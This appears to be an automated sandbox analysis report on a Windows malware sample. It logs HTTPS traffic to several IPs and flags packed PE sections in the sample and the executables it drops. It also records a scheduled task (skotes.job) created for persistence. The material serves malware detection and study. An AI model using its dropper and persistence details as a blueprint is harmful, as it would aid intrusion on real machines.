Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61119
Source: unknown Network traffic detected: HTTP traffic on port 61090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61110
Source: unknown Network traffic detected: HTTP traffic on port 61106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61111
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61112
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61113
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61114
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61115
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61159 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61136 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61127
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61128
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61129
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61120
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61121
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61122
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61123
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61124
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61125
Source: unknown Network traffic detected: HTTP traffic on port 61181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61140
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 61170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61138
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61139
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61130
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61131
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61132
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61133
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61134
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61135
Source: unknown Network traffic detected: HTTP traffic on port 61125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61136
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61137
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61160 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61137 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61149 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61115 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61190
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61191
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61192
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61193
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61194
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61195
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61150 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61138 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61185
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61187
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61188
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61189
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61196
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61197
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61198
Source: unknown Network traffic detected: HTTP traffic on port 61161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61091
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61095
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61096
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61088
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61089
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61139 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61097
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61098
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61099
Source: unknown Network traffic detected: HTTP traffic on port 61184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61150
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61151
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61149
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61141
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61142
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61143
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61144
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61145
Source: unknown Network traffic detected: HTTP traffic on port 61128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61147
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61148
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61160
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61161
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61162
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61151 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61153
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61155
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61156
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61158
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61159
Source: unknown Network traffic detected: HTTP traffic on port 61113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61170
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61173
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61197 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61167
Source: unknown Network traffic detected: HTTP traffic on port 61185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61169
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61183
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61184
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61176
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61179
Source: unknown Network traffic detected: HTTP traffic on port 61129 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61153 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61101 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61112 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61187 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61131 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61198 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61142 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61111 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 61120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 61143 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 61189 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 61094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 61188 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61155 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61095 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61121 -> 443
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.53.6:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.8:61175 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.8:61182 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.8:61188 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name: .idata
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: skotes.exe.24.dr Static PE information: section name:
Source: skotes.exe.24.dr Static PE information: section name: .idata
Source: skotes.exe.24.dr Static PE information: section name:
Source: eDPQZkT[1].exe.29.dr Static PE information: section name:
Source: eDPQZkT[1].exe.29.dr Static PE information: section name: .idata
Source: eDPQZkT[1].exe.29.dr Static PE information: section name:
Source: eDPQZkT.exe.29.dr Static PE information: section name:
Source: eDPQZkT.exe.29.dr Static PE information: section name: .idata
Source: eDPQZkT.exe.29.dr Static PE information: section name:
Source: random[1].exe.29.dr Static PE information: section name:
Source: random[1].exe.29.dr Static PE information: section name: .rsrc
Source: random[1].exe.29.dr Static PE information: section name: .idata
Source: random[1].exe.29.dr Static PE information: section name:
Source: ead1a5c329.exe.29.dr Static PE information: section name:
Source: ead1a5c329.exe.29.dr Static PE information: section name: .rsrc
Source: ead1a5c329.exe.29.dr Static PE information: section name: .idata
Source: ead1a5c329.exe.29.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAAB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CAAB700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAAB8C0 rand_s,NtQueryVirtualMemory, 0_2_6CAAB8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAAB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CAAB910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA4F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CA4F280
Creates files inside the system directory
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe File created: C:\Windows\Tasks\skotes.job
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA435A0 0_2_6CA435A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA34A0 0_2_6CAA34A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAAC4A0 0_2_6CAAC4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA56C80 0_2_6CA56C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA4D4E0 0_2_6CA4D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA86CF0 0_2_6CA86CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA564C0 0_2_6CA564C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA6D4D0 0_2_6CA6D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAB542B 0_2_6CAB542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CABAC00 0_2_6CABAC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA85C10 0_2_6CA85C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA92C10 0_2_6CA92C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA55440 0_2_6CA55440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAB545C 0_2_6CAB545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA85F0 0_2_6CAA85F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA80DD0 0_2_6CA80DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA5FD00 0_2_6CA5FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA70512 0_2_6CA70512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA6ED10 0_2_6CA6ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA4EA0 0_2_6CAA4EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAAE680 0_2_6CAAE680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA65E90 0_2_6CA65E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAB76E3 0_2_6CAB76E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA4BEF0 0_2_6CA4BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA5FEF0 0_2_6CA5FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA9E30 0_2_6CAA9E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA95600 0_2_6CA95600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA87E10 0_2_6CA87E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAB6E63 0_2_6CAB6E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA4C670 0_2_6CA4C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA64640 0_2_6CA64640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA92E4E 0_2_6CA92E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA69E50 0_2_6CA69E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA83E50 0_2_6CA83E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA977A0 0_2_6CA977A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA4DFE0 0_2_6CA4DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA76FF0 0_2_6CA76FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA59F00 0_2_6CA59F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA87710 0_2_6CA87710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA760A0 0_2_6CA760A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA6C0E0 0_2_6CA6C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA858E0 0_2_6CA858E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAB50C7 0_2_6CAB50C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA8B820 0_2_6CA8B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA94820 0_2_6CA94820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA57810 0_2_6CA57810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA8F070 0_2_6CA8F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA68850 0_2_6CA68850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA6D850 0_2_6CA6D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA4C9A0 0_2_6CA4C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA7D9B0 0_2_6CA7D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA85190 0_2_6CA85190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA2990 0_2_6CAA2990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA5D960 0_2_6CA5D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA9B970 0_2_6CA9B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CABB170 0_2_6CABB170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA6A940 0_2_6CA6A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA422A0 0_2_6CA422A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA74AA0 0_2_6CA74AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA5CAB0 0_2_6CA5CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAB2AB0 0_2_6CAB2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CABBA90 0_2_6CABBA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA61AF0 0_2_6CA61AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA8E2F0 0_2_6CA8E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA88AC0 0_2_6CA88AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA89A60 0_2_6CA89A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA4F380 0_2_6CA4F380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAB53C8 0_2_6CAB53C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA8D320 0_2_6CA8D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA5C370 0_2_6CA5C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA45340 0_2_6CA45340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4ECD0 0_2_6CB4ECD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAEECC0 0_2_6CAEECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBCAC30 0_2_6CBCAC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB6C00 0_2_6CBB6C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAFAC60 0_2_6CAFAC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC7CDC0 0_2_6CC7CDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF4DB0 0_2_6CAF4DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB86D90 0_2_6CB86D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC1AD50 0_2_6CC1AD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBBED70 0_2_6CBBED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC78D20 0_2_6CC78D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB76E90 0_2_6CB76E90
